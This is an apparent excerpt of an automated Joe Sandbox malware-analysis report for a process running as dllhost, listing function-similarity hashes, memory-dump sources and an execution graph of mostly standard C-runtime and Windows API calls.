                                                  • Instruction Fuzzy Hash: 7E51E832A04B8181E674DE29A47C3AE6B71F3C7788F646817DE5A83B99DE39CC05C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction ID: aff0bec576eb86ec2a84624270c2b0384e7bc16a73a386c23f9071d3fb41e299
                                                  • Opcode Fuzzy Hash: a661c2d173b23182f505dc60736120a771a3f0ad42df517ff57706cbb13cb6f8
                                                  • Instruction Fuzzy Hash: AF41D523714A8082DB209F25E4483AA7BA0F799788FA19523EE4DC7799EF7CC801C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction ID: 9b414215cc57ed229641e32026660d1f16aef335fa8ef4c6c86128ac512eca36
                                                  • Opcode Fuzzy Hash: f7608c98f8767320f9864fb27da0f260c0020aa91a68daba2c90f21ed4f13150
                                                  • Instruction Fuzzy Hash: F1113D32614B8082EB618F15F444259B7E4F789B98F689622EF8D47765DF3DC951CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `managed vector destructor iterator'$ure'
                                                  • API String ID: 592178966-1581490017
                                                  • Opcode ID: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction ID: a4225eddb28904649d7124418f1a67905be02103f54e6e982dcdf99aea2a2cbd
                                                  • Opcode Fuzzy Hash: 85a87bb11024578e2bec427d8c38cd0b0f4a35d12cc8a3acd2ec31d7a1335686
                                                  • Instruction Fuzzy Hash: ACE08661650B4994DF018F21E4442987364EB5AB58B58A123D95C4A311FE78D5E9C311
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: `eh vector copy constructor iterator'$ure'
                                                  • API String ID: 592178966-2675205102
                                                  • Opcode ID: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction ID: ec22391b0e2a0045cd0a5b0ae43f3d7893273ad22bc153f511e28ee9d1e90fc6
                                                  • Opcode Fuzzy Hash: 6d266e532462436e4859bb4742975a48e79c85926c4f17d2627f74bd81432aff
                                                  • Instruction Fuzzy Hash: 0FE08C61A50B4994DF028F21E4802987364FB6AB48B98A223CA5C8A312EE78D5E9C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                  • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                  • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000003.1924663454.000002D8B0A30000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_3_2d8b0a30000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: std::bad_alloc::bad_alloc
                                                  • String ID: vector constructor iterator'$lue
                                                  • API String ID: 1875163511-1709709380
                                                  • Opcode ID: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction ID: 9f7b7816a06fb02c24336e777a07eb83ca4e2aae7a64365de8d4f39106fdd5d6
                                                  • Opcode Fuzzy Hash: 5871adbce02aa8774d2d44c927412324eb05a701dec9d45e0cdc00cd11f5aded
                                                  • Instruction Fuzzy Hash: FCD09E22255A8695DE10EB04E89938D6370F39574CFB06913D14CC6575DF78CE46C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction ID: b655f87b30b6f0cc26f84b45b70bcdd9dc1fffc34b55a4e95cb2993612ac4ca8
                                                  • Opcode Fuzzy Hash: 6827040540fda7ad193ca04f20f1a702de29ed0253c6c81da601d7f1dcb7858b
                                                  • Instruction Fuzzy Hash: 38114025A11B8081EB04DB66A40C21D7BF1F78AFD4F6DA526DE4D93775DF38D8528300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                  • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                  • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction ID: be20d96d829291a865dbc99c429e825ca50bb6430806478e757953bdb3e87946
                                                  • Opcode Fuzzy Hash: 1f44e6271c1b5e39a937113a1e618e8eb6fe08943c73d2d47ba7f0255cfb855b
                                                  • Instruction Fuzzy Hash: 1BE06531A01A0086E7088FA2D80C34D3BE1FB8AF09F98D536C90947361EF7D98998B80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2937186859.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 00000005.00000002.2936370774.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938038866.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2938877817.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_140000000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                  • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                  • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2958401876.000002D8B0A61000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002D8B0A60000, based on PE: true
                                                  • Associated: 00000005.00000002.2957429933.000002D8B0A60000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2959449592.000002D8B0A77000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2960392912.000002D8B0A82000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2961357383.000002D8B0A84000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000005.00000002.2962316357.000002D8B0A8A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_2d8b0a60000_dllhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction ID: 5a64494de52646e98b48464ae61d663a33c882bba68e0486800f5cc89a7e3be5
                                                  • Opcode Fuzzy Hash: a071b283022ea7c31aadf8865349afa3b666824985d16808c3a72c4ba9c96523
                                                  • Instruction Fuzzy Hash: 82E0E571611A4086E7089B62D80C25D7BA1FB89B19F98D536C90947721EE38A8998B10

                                                  Execution Graph

                                                  Execution Coverage:2.6%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:1437
                                                  Total number of Limit Nodes:14
                                                  execution_graph 7741 225dc64e3ec 7742 225dc64e411 7741->7742 7751 225dc64e428 7741->7751 7773 225dc64dffc 7742->7773 7745 225dc64e4e0 7807 225dc64c84c 7745->7807 7748 225dc64e421 7751->7745 7755 225dc64e475 7751->7755 7756 225dc64e4b8 7751->7756 7779 225dc64e630 7751->7779 7752 225dc64e540 7754 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7752->7754 7753 225dc64e5d1 7758 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7753->7758 7757 225dc64e547 7754->7757 7759 225dc64e498 7755->7759 7801 225dc64e094 7755->7801 7756->7759 7765 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7756->7765 7757->7759 7764 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7757->7764 7761 225dc64e5dc 7758->7761 7762 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7759->7762 7760 225dc64e572 7760->7753 7760->7760 7770 225dc64e617 7760->7770 7813 225dc6518a0 7760->7813 7766 225dc64e5f5 7761->7766 7767 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7761->7767 7762->7748 7764->7757 7765->7756 7768 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7766->7768 7767->7761 7768->7748 7822 225dc64dee0 IsProcessorFeaturePresent 7770->7822 7826 225dc64d8f0 GetLastError 7773->7826 7775 225dc64e005 7776 225dc64dec0 7775->7776 7878 225dc64dd58 7776->7878 7780 225dc64e65e 7779->7780 7780->7780 7781 225dc64e01c _invalid_parameter_noinfo 11 API calls 7780->7781 7782 225dc64e6a9 7781->7782 7783 225dc6518a0 49 API calls 7782->7783 7784 225dc64e6df 7783->7784 7785 225dc64dee0 _invalid_parameter_noinfo 17 API calls 7784->7785 7786 225dc64e7b3 7785->7786 7989 225dc64eb04 7786->7989 7793 225dc64e95d 7794 225dc64eb04 23 API calls 7793->7794 7795 225dc64e98d 7794->7795 7796 225dc64fef8 5 API calls 7795->7796 7797 225dc64e9b6 7796->7797 8022 225dc64e260 7797->8022 7800 225dc64e630 59 API calls 7802 225dc64e099 HeapFree 7801->7802 7803 225dc64e0ca 7801->7803 7802->7803 7804 225dc64e0b4 GetLastError 7802->7804 7803->7755 7805 225dc64e0c1 Concurrency::details::SchedulerProxy::DeleteThis 7804->7805 7806 225dc64dffc __std_exception_copy 9 API calls 7805->7806 7806->7803 7808 225dc64c89c 7807->7808 7809 225dc64c864 7807->7809 7808->7752 7808->7760 7809->7808 7810 225dc64e01c _invalid_parameter_noinfo 11 API calls 7809->7810 7811 225dc64c892 7810->7811 7812 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7811->7812 7812->7808 7817 225dc6518bd 7813->7817 7814 225dc6518c2 7815 225dc6518d8 7814->7815 7816 225dc64dffc __std_exception_copy 11 API calls 7814->7816 7815->7760 7818 225dc6518cc 7816->7818 7817->7814 7817->7815 7820 225dc65190c 7817->7820 7819 225dc64dec0 _invalid_parameter_noinfo 49 API calls 7818->7819 7819->7815 7820->7815 7821 225dc64dffc __std_exception_copy 11 API calls 7820->7821 7821->7818 7823 225dc64def3 7822->7823 8074 225dc64dbf4 7823->8074 7827 225dc64d931 FlsSetValue 7826->7827 7832 225dc64d914 7826->7832 7828 225dc64d943 7827->7828 7833 225dc64d921 SetLastError 7827->7833 7843 225dc64e01c 7828->7843 7832->7827 7832->7833 7833->7775 7834 225dc64d970 FlsSetValue 7837 225dc64d97c FlsSetValue 7834->7837 7838 225dc64d98e 7834->7838 7835 225dc64d960 FlsSetValue 7836 225dc64d969 7835->7836 7839 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 7836->7839 7837->7836 7850 225dc64d4e4 7838->7850 7839->7833 7848 225dc64e02d _invalid_parameter_noinfo 7843->7848 7844 225dc64e07e 7846 225dc64dffc __std_exception_copy 10 API calls 7844->7846 7845 225dc64e062 HeapAlloc 7847 225dc64d952 7845->7847 7845->7848 7846->7847 7847->7834 7847->7835 7848->7844 7848->7845 7855 225dc64c1ac 7848->7855 7864 225dc64d3bc 7850->7864 7858 225dc64c1ec 7855->7858 7863 225dc64d2ec EnterCriticalSection 7858->7863 7876 225dc64d2ec EnterCriticalSection 7864->7876 7879 225dc64dd83 7878->7879 7886 225dc64ddf4 7879->7886 7881 225dc64ddaa 7882 225dc64ddcd 7881->7882 7896 225dc64d0f0 7881->7896 7884 225dc64dde2 7882->7884 7885 225dc64d0f0 _invalid_parameter_noinfo 28 API calls 7882->7885 7884->7748 7885->7884 7909 225dc64db3c 7886->7909 7891 225dc64dee0 _invalid_parameter_noinfo 17 API calls 7893 225dc64debf 7891->7893 7892 225dc64de2f 7892->7881 7894 225dc64dd58 _invalid_parameter_noinfo 49 API calls 7893->7894 7895 225dc64ded9 7894->7895 7895->7881 7897 225dc64d148 7896->7897 7898 225dc64d0ff GetLastError 7896->7898 7897->7882 7899 225dc64d114 7898->7899 7900 225dc64d9b8 _invalid_parameter_noinfo 14 API calls 7899->7900 7901 225dc64d12e SetLastError 7900->7901 7901->7897 7902 225dc64d151 7901->7902 7903 225dc64d0f0 _invalid_parameter_noinfo 26 API calls 7902->7903 7904 225dc64d177 7903->7904 7932 225dc650d80 7904->7932 7910 225dc64db58 GetLastError 7909->7910 7911 225dc64db93 7909->7911 7912 225dc64db68 7910->7912 7911->7892 7915 225dc64dba8 7911->7915 7918 225dc64d9b8 7912->7918 7916 225dc64dbdc 7915->7916 7917 225dc64dbc4 GetLastError SetLastError 7915->7917 7916->7891 7916->7892 7917->7916 7919 225dc64d9d7 FlsGetValue 7918->7919 7921 225dc64d9ec 7918->7921 7920 225dc64d9e4 SetLastError 7919->7920 7919->7921 7920->7911 7921->7920 7922 225dc64e01c _invalid_parameter_noinfo 11 API calls 7921->7922 7923 225dc64da0e 7922->7923 7924 225dc64da2c FlsSetValue 7923->7924 7928 225dc64da1c 7923->7928 7925 225dc64da4a 7924->7925 7926 225dc64da38 FlsSetValue 7924->7926 7927 225dc64d4e4 _invalid_parameter_noinfo 11 API calls 7925->7927 7926->7928 7929 225dc64da52 7927->7929 7930 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7928->7930 7931 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7929->7931 7930->7920 7931->7920 7933 225dc650d99 7932->7933 7934 225dc64d19f 7932->7934 7933->7934 7940 225dc6513ac 7933->7940 7936 225dc650dec 7934->7936 7937 225dc64d1af 7936->7937 7938 225dc650e05 7936->7938 7937->7882 7938->7937 7986 225dc64f640 7938->7986 7949 225dc64d778 GetLastError 7940->7949 7942 225dc6513bb 7948 225dc651401 7942->7948 7985 225dc64d2ec EnterCriticalSection 7942->7985 7948->7934 7950 225dc64d7b9 FlsSetValue 7949->7950 7951 225dc64d79c FlsGetValue 7949->7951 7953 225dc64d7cb 7950->7953 7968 225dc64d7a9 7950->7968 7952 225dc64d7b3 7951->7952 7951->7968 7952->7950 7955 225dc64e01c _invalid_parameter_noinfo 11 API calls 7953->7955 7954 225dc64d825 SetLastError 7956 225dc64d832 7954->7956 7965 225dc64d845 7954->7965 7957 225dc64d7da 7955->7957 7956->7942 7958 225dc64d7f8 FlsSetValue 7957->7958 7959 225dc64d7e8 FlsSetValue 7957->7959 7961 225dc64d816 7958->7961 7962 225dc64d804 FlsSetValue 7958->7962 7960 225dc64d7f1 7959->7960 7963 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7960->7963 7964 225dc64d4e4 _invalid_parameter_noinfo 11 API calls 7961->7964 7962->7960 7963->7968 7969 225dc64d81e 7964->7969 7966 225dc64d878 FlsSetValue 7965->7966 7967 225dc64d85d FlsGetValue 7965->7967 7971 225dc64d885 7966->7971 7974 225dc64d86a 7966->7974 7970 225dc64d872 7967->7970 7967->7974 7968->7954 7972 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7969->7972 7970->7966 7973 225dc64e01c _invalid_parameter_noinfo 11 API calls 7971->7973 7972->7954 7975 225dc64d894 7973->7975 7974->7942 7976 225dc64d8b2 FlsSetValue 7975->7976 7977 225dc64d8a2 FlsSetValue 7975->7977 7979 225dc64d8be FlsSetValue 7976->7979 7980 225dc64d8d0 7976->7980 7978 225dc64d8ab 7977->7978 7981 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7978->7981 7979->7978 7982 225dc64d4e4 _invalid_parameter_noinfo 11 API calls 7980->7982 7981->7974 7983 225dc64d8d8 7982->7983 7984 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7983->7984 7984->7974 7987 225dc64d778 _invalid_parameter_noinfo 23 API calls 7986->7987 7988 225dc64f649 7987->7988 7990 225dc64eb28 7989->7990 7996 225dc64e896 7989->7996 7991 225dc64d778 _invalid_parameter_noinfo 23 API calls 7990->7991 7990->7996 7992 225dc64eb43 7991->7992 8044 225dc650d4c 7992->8044 7997 225dc64fef8 7996->7997 8052 225dc64fce4 7997->8052 8000 225dc64e0e4 8001 225dc64e132 8000->8001 8002 225dc64e10e 8000->8002 8003 225dc64e18c 8001->8003 8004 225dc64e137 8001->8004 8006 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8002->8006 8008 225dc64e11d FindFirstFileExW 8002->8008 8068 225dc64f9cc 8003->8068 8007 225dc64e14c 8004->8007 8004->8008 8009 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8004->8009 8006->8008 8061 225dc64d35c 8007->8061 8008->7793 8009->8007 8023 225dc64e28a 8022->8023 8024 225dc64e2ae 8022->8024 8027 225dc64e299 8023->8027 8029 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8023->8029 8025 225dc64e308 8024->8025 8026 225dc64e2b4 8024->8026 8071 225dc64fa5c 8025->8071 8026->8027 8030 225dc64e2c9 8026->8030 8031 225dc64e094 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 8026->8031 8027->7800 8029->8027 8032 225dc64d35c 12 API calls 8030->8032 8031->8030 8032->8027 8045 225dc64eb66 8044->8045 8046 225dc650d61 8044->8046 8048 225dc650db8 8045->8048 8046->8045 8047 225dc6513ac _invalid_parameter_noinfo 23 API calls 8046->8047 8047->8045 8049 225dc650dcd 8048->8049 8051 225dc650de0 8048->8051 8050 225dc64f640 _invalid_parameter_noinfo 23 API calls 8049->8050 8049->8051 8050->8051 8051->7996 8053 225dc64e8c1 8052->8053 8059 225dc64fd3c __vcrt_FlsAlloc 8052->8059 8053->8000 8054 225dc64fd71 LoadLibraryExW 8056 225dc64fe46 8054->8056 8057 225dc64fd96 GetLastError 8054->8057 8055 225dc64fe66 GetProcAddress 8055->8053 8056->8055 8058 225dc64fe5d FreeLibrary 8056->8058 8057->8059 8058->8055 8059->8053 8059->8054 8059->8055 8060 225dc64fdd0 LoadLibraryExW 8059->8060 8060->8056 8060->8059 8062 225dc64d3a7 8061->8062 8067 225dc64d36b _invalid_parameter_noinfo 8061->8067 8064 225dc64dffc __std_exception_copy 11 API calls 8062->8064 8063 225dc64d38e HeapAlloc 8065 225dc64d3a5 8063->8065 8063->8067 8064->8065 8065->8008 8066 225dc64c1ac _invalid_parameter_noinfo 2 API calls 8066->8067 8067->8062 8067->8063 8067->8066 8070 225dc64f9d5 MultiByteToWideChar 8068->8070 8073 225dc64fa80 WideCharToMultiByte 8071->8073 8075 225dc64dc2e _invalid_parameter_noinfo 8074->8075 8076 225dc64dc56 RtlCaptureContext RtlLookupFunctionEntry 8075->8076 8077 225dc64dcc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8076->8077 8078 225dc64dc90 RtlVirtualUnwind 8076->8078 8081 225dc64dd18 _invalid_parameter_noinfo 8077->8081 8078->8077 8079 225dc647d30 _log10_special 8 API calls 8080 225dc64dd37 GetCurrentProcess TerminateProcess 8079->8080 8081->8079 8082 225dc64b9ec 8105 225dc648fe4 8082->8105 8084 225dc64ba21 8085 225dc648fe4 _CreateFrameInfo 9 API calls 8084->8085 8086 225dc64ba2f __except_validate_context_record 8085->8086 8087 225dc648fe4 _CreateFrameInfo 9 API calls 8086->8087 8088 225dc64ba73 8087->8088 8089 225dc648fe4 _CreateFrameInfo 9 API calls 8088->8089 8090 225dc64ba7c 8089->8090 8091 225dc648fe4 _CreateFrameInfo 9 API calls 8090->8091 8092 225dc64ba85 8091->8092 8108 225dc64a3b8 8092->8108 8095 225dc648fe4 _CreateFrameInfo 9 API calls 8096 225dc64bab5 __CxxCallCatchBlock 8095->8096 8115 225dc64a3f4 8096->8115 8098 225dc64bb8f __CxxCallCatchBlock 8099 225dc648fe4 _CreateFrameInfo 9 API calls 8098->8099 8100 225dc64bba2 8099->8100 8102 225dc648fe4 _CreateFrameInfo 9 API calls 8100->8102 8104 225dc64bbab 8102->8104 8126 225dc649000 8105->8126 8107 225dc648fed 8107->8084 8109 225dc648fe4 _CreateFrameInfo 9 API calls 8108->8109 8110 225dc64a3c9 8109->8110 8111 225dc64a3d4 8110->8111 8112 225dc648fe4 _CreateFrameInfo 9 API calls 8110->8112 8113 225dc648fe4 _CreateFrameInfo 9 API calls 8111->8113 8112->8111 8114 225dc64a3e5 8113->8114 8114->8095 8114->8096 8116 225dc648fe4 _CreateFrameInfo 9 API calls 8115->8116 8117 225dc64a406 8116->8117 8118 225dc64a441 8117->8118 8119 225dc648fe4 _CreateFrameInfo 9 API calls 8117->8119 8120 225dc64a411 8119->8120 8120->8118 8121 225dc648fe4 _CreateFrameInfo 9 API calls 8120->8121 8122 225dc64a432 8121->8122 8122->8098 8123 225dc648cb8 8122->8123 8124 225dc648fe4 _CreateFrameInfo 9 API calls 8123->8124 8125 225dc648cc6 8124->8125 8125->8098 8127 225dc649018 8126->8127 8128 225dc64901f GetLastError 8126->8128 8127->8107 8138 225dc64a708 8128->8138 8142 225dc64a528 8138->8142 8143 225dc64a612 TlsGetValue 8142->8143 8149 225dc64a56c __vcrt_FlsAlloc 8142->8149 8144 225dc64a59a LoadLibraryExW 8146 225dc64a639 8144->8146 8147 225dc64a5bb GetLastError 8144->8147 8145 225dc64a659 GetProcAddress 8145->8143 8146->8145 8148 225dc64a650 FreeLibrary 8146->8148 8147->8149 8148->8145 8149->8143 8149->8144 8149->8145 8150 225dc64a5dd LoadLibraryExW 8149->8150 8150->8146 8150->8149 8151 225dc6483ec 8154 225dc648d80 8151->8154 8153 225dc648415 8155 225dc648da1 8154->8155 8156 225dc648dd6 __vcrt_freefls 8154->8156 8155->8156 8158 225dc64d038 8155->8158 8156->8153 8159 225dc64d045 8158->8159 8160 225dc64d04f 8158->8160 8159->8160 8165 225dc64d06a 8159->8165 8161 225dc64dffc __std_exception_copy 11 API calls 8160->8161 8162 225dc64d056 8161->8162 8163 225dc64dec0 _invalid_parameter_noinfo 49 API calls 8162->8163 8164 225dc64d062 8163->8164 8164->8156 8165->8164 8166 225dc64dffc __std_exception_copy 11 API calls 8165->8166 8166->8162 8897 225dc64bae6 8898 225dc648fe4 _CreateFrameInfo 9 API calls 8897->8898 8900 225dc64baf3 __CxxCallCatchBlock 8898->8900 8899 225dc64bb37 RaiseException 8901 225dc64bb5e 8899->8901 8900->8899 8902 225dc64a3f4 __CxxCallCatchBlock 9 API calls 8901->8902 8903 225dc64bb66 